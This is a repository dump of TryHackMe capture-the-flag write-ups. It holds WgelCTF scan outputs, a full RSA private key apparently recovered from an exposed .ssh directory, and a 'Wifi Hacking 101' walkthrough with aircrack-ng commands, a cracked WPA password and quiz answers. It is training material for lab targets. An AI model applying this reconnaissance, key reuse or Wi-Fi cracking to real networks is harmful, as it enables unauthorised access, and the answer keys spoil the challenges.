| 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /WgelCTF/gobuster_result.txt: -------------------------------------------------------------------------------- 1 | gobuster dir -u 10.10.174.40 -w /usr/share/wordlists/dirb/common.txt 2 | =============================================================== 3 | Gobuster v3.0.1 4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 5 | =============================================================== 6 | [+] Url: http://10.10.174.40 7 | [+] Threads: 10 8 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt 9 | [+] Status codes: 200,204,301,302,307,401,403 10 | [+] User Agent: gobuster/3.0.1 11 | [+] Timeout: 10s 12 | =============================================================== 13 | 2020/05/29 02:04:55 Starting gobuster 14 | =============================================================== 15 | /.hta (Status: 403) 16 | /.htaccess (Status: 403) 17 | /.htpasswd (Status: 403) 18 | /index.html (Status: 200) 19 | /server-status (Status: 403) 20 | /sitemap (Status: 301) 21 | =============================================================== 22 | 2020/05/29 02:06:44 Finished 23 | =============================================================== 24 | -------------------------------------------------------------------------------- /WgelCTF/gobuster_sitemap_result.txt: -------------------------------------------------------------------------------- 1 | gobuster dir -u http://10.10.174.40/sitemap/ -w /usr/share/wordlists/dirb/common.txt 2 | =============================================================== 3 | Gobuster v3.0.1 4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) 5 | =============================================================== 6 | [+] Url: http://10.10.174.40/sitemap/ 7 | [+] Threads: 10 8 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt 9 | [+] Status codes: 200,204,301,302,307,401,403 10 | [+] User Agent: gobuster/3.0.1 11 | [+] Timeout: 10s 12 | =============================================================== 13 | 2020/05/29 02:08:48 Starting gobuster 14 | =============================================================== 15 | /.hta (Status: 403) 16 | /.htaccess (Status: 403) 17 | /.htpasswd (Status: 403) 18 | /.ssh (Status: 301) 19 | /css (Status: 301) 20 | /fonts (Status: 301) 21 | /images (Status: 301) 22 | /index.html (Status: 200) 23 | /js (Status: 301) 24 | =============================================================== 25 | 2020/05/29 02:10:39 Finished 26 | =============================================================== 27 | -------------------------------------------------------------------------------- /WgelCTF/id_rsa: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEA2mujeBv3MEQFCel8yvjgDz066+8Gz0W72HJ5tvG8bj7Lz380 3 | m+JYAquy30lSp5jH/bhcvYLsK+T9zEdzHmjKDtZN2cYgwHw0dDadSXWFf9W2gc3x 4 | W69vjkHLJs+lQi0bEJvqpCZ1rFFSpV0OjVYRxQ4KfAawBsCG6lA7GO7vLZPRiKsP 5 | y4lg2StXQYuZ0cUvx8UkhpgxWy/OO9ceMNondU61kyHafKobJP7Py5QnH7cP/psr 6 | +J5M/fVBoKPcPXa71mA/ZUioimChBPV/i/0za0FzVuJZdnSPtS7LzPjYFqxnm/BH 7 | Wo/Lmln4FLzLb1T31pOoTtTKuUQWxHf7cN8v6QIDAQABAoIBAFZDKpV2HgL+6iqG 8 | /1U+Q2dhXFLv3PWhadXLKEzbXfsAbAfwCjwCgZXUb9mFoNI2Ic4PsPjbqyCO2LmE 9 | AnAhHKQNeUOn3ymGJEU9iJMJigb5xZGwX0FBoUJCs9QJMBBZthWyLlJUKic7GvPa 10 | M7QYKP51VCi1j3GrOd1ygFSRkP6jZpOpM33dG1/ubom7OWDZPDS9AjAOkYuJBobG 11 | SUM+uxh7JJn8uM9J4NvQPkC10RIXFYECwNW+iHsB0CWlcF7CAZAbWLsJgd6TcGTv 12 | 2KBA6YcfGXN0b49CFOBMLBY/dcWpHu+d0KcruHTeTnM7aLdrexpiMJ3XHVQ4QRP2 13 | p3xz9QECgYEA+VXndZU98FT+armRv8iwuCOAmN8p7tD1W9S2evJEA5uTCsDzmsDj 14 | 7pUO8zziTXgeDENrcz1uo0e3bL13MiZeFe9HQNMpVOX+vEaCZd6ZNFbJ4R889D7I 15 | dcXDvkNRbw42ZWx8TawzwXFVhn8Rs9fMwPlbdVh9f9h7papfGN2FoeECgYEA4EIy 16 | GW9eJnl0tzL31TpW2lnJ+KYCRIlucQUnBtQLWdTncUkm+LBS5Z6dGxEcwCrYY1fh 17 | shl66KulTmE3G9nFPKezCwd7jFWmUUK0hX6Sog7VRQZw72cmp7lYb1KRQ9A0Nb97 18 | uhgbVrK/Rm+uACIJ+YD57/ZuwuhnJPirXwdaXwkCgYBMkrxN2TK3f3LPFgST8K+N 19 | LaIN0OOQ622e8TnFkmee8AV9lPp7eWfG2tJHk1gw0IXx4Da8oo466QiFBb74kN3u 20 | QJkSaIdWAnh0G/dqD63fbBP95lkS7cEkokLWSNhWkffUuDeIpy0R6JuKfbXTFKBW 21 | V35mEHIidDqtCyC/gzDKIQKBgDE+d+/b46nBK976oy9AY0gJRW+DTKYuI4FP51T5 22 | hRCRzsyyios7dMiVPtxtsomEHwYZiybnr3SeFGuUr1w/Qq9iB8/ZMckMGbxoUGmr 23 | 9Jj/dtd0ZaI8XWGhMokncVyZwI044ftoRcCQ+a2G4oeG8ffG2ZtW2tWT4OpebIsu 24 | eyq5AoGBANCkOaWnitoMTdWZ5d+WNNCqcztoNppuoMaG7L3smUSBz6k8J4p4yDPb 25 | QNF1fedEOvsguMlpNgvcWVXGINgoOOUSJTxCRQFy/onH6X1T5OAAW6/UXc4S7Vsg 26 | jL8g9yBg4vPB8dHC6JeJpFFE06vxQMFzn6vjEab9GhnpMihrSCod 27 | -----END RSA PRIVATE KEY----- -------------------------------------------------------------------------------- /WgelCTF/id_rsa.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/id_rsa.png -------------------------------------------------------------------------------- /WgelCTF/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Fri May 29 02:03:43 2020 as: nmap -A -oN nmap_basic.nmap 10.10.174.40 2 | Nmap scan report for 10.10.174.40 3 | Host is up (0.22s latency). 4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA) 9 | | 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA) 10 | |_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519) 11 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 12 | |_http-server-header: Apache/2.4.18 (Ubuntu) 13 | |_http-title: Apache2 Ubuntu Default Page: It works 14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 15 | TCP/IP fingerprint: 16 | OS:SCAN(V=7.80%E=4%D=5/29%OT=22%CT=1%CU=41193%PV=Y%DS=2%DC=T%G=Y%TM=5ED0204 17 | OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=A)OPS 18 | OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1 19 | OS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN 20 | OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A 21 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R 22 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F 23 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% 24 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD 25 | OS:=S) 26 | 27 | Network Distance: 2 hops 28 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 29 | 30 | TRACEROUTE (using port 23/tcp) 31 | HOP RTT ADDRESS 32 | 1 295.07 ms 10.9.0.1 33 | 2 295.26 ms 10.10.174.40 34 | 35 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 36 | # Nmap done at Fri May 29 02:04:18 2020 -- 1 IP address (1 host up) scanned in 34.53 seconds 37 | -------------------------------------------------------------------------------- /WgelCTF/root.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/root.png -------------------------------------------------------------------------------- /WgelCTF/ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/ssh.png -------------------------------------------------------------------------------- /WgelCTF/ssh2john.txt: -------------------------------------------------------------------------------- 1 | /usr/share/john/ssh2john.py id_rsa 2 | id_rsa has no password! -------------------------------------------------------------------------------- /WgelCTF/user.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/user.png -------------------------------------------------------------------------------- /Wifi Hacking 101/Captures.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Wifi Hacking 101/Captures.tar.gz -------------------------------------------------------------------------------- /Wifi Hacking 101/README.md: -------------------------------------------------------------------------------- 1 | # Wifi Hacking 101 | https://tryhackme.com/room/wifihacking101 2 | 3 | ### [Task 1] The basics - An Intro to WPA 4 | 5 | Key Terms : 6 | 7 | ● SSID: The network "name" that you see when you try and connect 8 | 9 | ● ESSID: An SSID that *may* apply to multiple access points, eg a company office, normally forming a bigger network. For Aircrack they normally refer to the network you're attacking. 10 | 11 | ● BSSID: An access point MAC (hardware) address 12 | 13 | ● WPA2-PSK: Wifi networks that you connect to by providing a password that's the same for everyone 14 | 15 | ● WPA2-EAP: Wifi networks that you authenticate to by providing a username and password, which is sent to a RADIUS server. 16 | 17 | ● RADIUS: A server for authenticating clients, not just for wifi. 18 | 19 | The core of WPA(2) authentication is the 4 way handshake. 20 | 21 | Most home WiFi networks, and many others, use WPA(2) personal. If you have to log in with a password and it's not WEP, then it's WPA(2) personal. WPA2-EAP uses RADIUS servers to authenticate, so if you have to enter a username and password in order to connect then it's probably that. 22 | 23 | Previously, the WEP (Wired Equivalent Privacy) standard was used. This was shown to be insecure and can be broken by capturing enough packets to guess the key via statistical methods. 24 | 25 | The 4 way handshake allows the client and the AP to both prove that they know they key, without telling each other. WPA and WPA2 use practically the same authentication method, so the attacks on both are the same. 26 | 27 | The keys for WPA are derived from both the ESSID and the password for the network. The ESSID acts somewhat similar to a salt in that it makes dictionary attacks more difficult. It means that for a given password, the key will still vary for each access point. This means that unless you precompute the dictionary for just that accesspoint, you will need to try passwords until you find the correct one. 28 | 29 | Room Banner by Frank Wang on Unsplash 30 | 31 | #1 What type of attack on the encryption can you perform on WPA(2) personal? : `brute force` 32 | 33 | #2 Can this method be used to attack WPA2-EAP handshakes? (Yea/Nay) : `Nay` 34 | 35 | #3 What three letter abbreviation is the technical term for the "wifi code"? : `psk` 36 | 37 | #4 What's the minimum length of a WPA2 Personal password? : `8` 38 | 39 | ### [Task 2] You're being watched - Capturing packets to attack 40 | 41 | Using the Aircrack-ng suite, we can start attacking a wifi network. This will walk you through attacking a network yourself, assuming you have a monitor mode enabled NIC. 42 | 43 | The aircrack-ng suite consists of : 44 | 45 | ● aircrack-ng 46 | ● airdecap-ng 47 | ● airmon-ng 48 | ● aireplay-ng 49 | ● airodump-ng 50 | ● airtun-ng 51 | ● packetforge-ng 52 | ● airbase-ng 53 | ● airdecloak-ng 54 | ● airolib-ng 55 | ● airserv-ng 56 | ● buddy-ng 57 | ● ivstools 58 | ● easside-ng 59 | ● tkiptun-ng 60 | ● wesside-ng 61 | 62 | We'll want to use aircrack-ng, airodump-ng and airmon-ng to attack WPA networks. 63 | 64 | The aircrack tools come by default with Kali, or can be installed with a package manager or from https://www.aircrack-ng.org/ 65 | 66 | I suggest creating a hotspot on a phone/tablet, picking a weak password (From rockyou.txt) and following along with every stage. To generate 5 random passwords from rockyou, you can use this command on Kali: `head /usr/share/wordlists/rockyou.txt -n 10000 | shuf -n 5 -` 67 | 68 | You will need a monitor mode NIC in order to capture the 4 way handshake. Many wireless cards support this, but it's important to note that not all of them do. 69 | 70 | Injection mode helps, as you can use it to deauth a client in order to force a reconnect which forces the handshake to occur again. Otherwise, you have to wait for a client to connect normally. 71 | 72 | #1 How do you put the interface “wlan0” into monitor mode with Aircrack tools? (Full command) : `airmon-ng wlan0 start` 73 | 74 | #2 What is the new interface name likely to be after you enable monitor mode? : `wlan0mon` 75 | 76 | #3 What do you do if other processes are currently trying to use that network adapter? : `airmon-ng check kill` 77 | 78 | #4 What tool from the aircrack-ng suite is used to create a capture? : `airodump-ng` 79 | 80 | #5 What flag do you use to set the BSSID to monitor? : `--bssid` 81 | 82 | #6 And to set the channel? : `--channel` 83 | 84 | #7 And how do you tell it to capture packets to a file? : `-w` 85 | 86 | ### [Task 3] Aircrack-ng - Let's Get Cracking 87 | 88 | I will attach a capture for you to practice cracking on. If you are spending more than 3 mins cracking, something is likely wrong. (A single core VM on my laptop took around 1min). 89 | 90 | In order to crack the password, we can either use aircrack itself or create a hashcat file in order to use GPU acceleration. There are two different versions of hashcat output file, most likely you want 3.6+ as that will work with recent versions of hashcat. 91 | 92 | Useful Information : 93 | 94 | BSSID: 02:1A:11:FF:D9:BD 95 | 96 | ESSID: 'James Honor 8' 97 | 98 | #1 What flag do we use to specify a BSSID to attack? : `-b` 99 | 100 | #2 What flag do we use to specify a wordlist? : `-w` 101 | 102 | #3 How do we create a HCCAPX in order to use hashcat to crack the password? : `-j` 103 | 104 | #4 Using the rockyou wordlist, crack the password in the attached capture. What's the password? : `greeneggsandham` 105 | 106 | `aircrack-ng -a2 --bssid 02:1A:11:FF:D9:BD -w /usr/share/wordlists/rockyou.txt NinjaJc01-01.cap` 107 | 108 | #5 Where is password cracking likely to be fastest, CPU or GPU? : `GPU` 109 | 110 | 111 | --------------------------------------------------------------------------------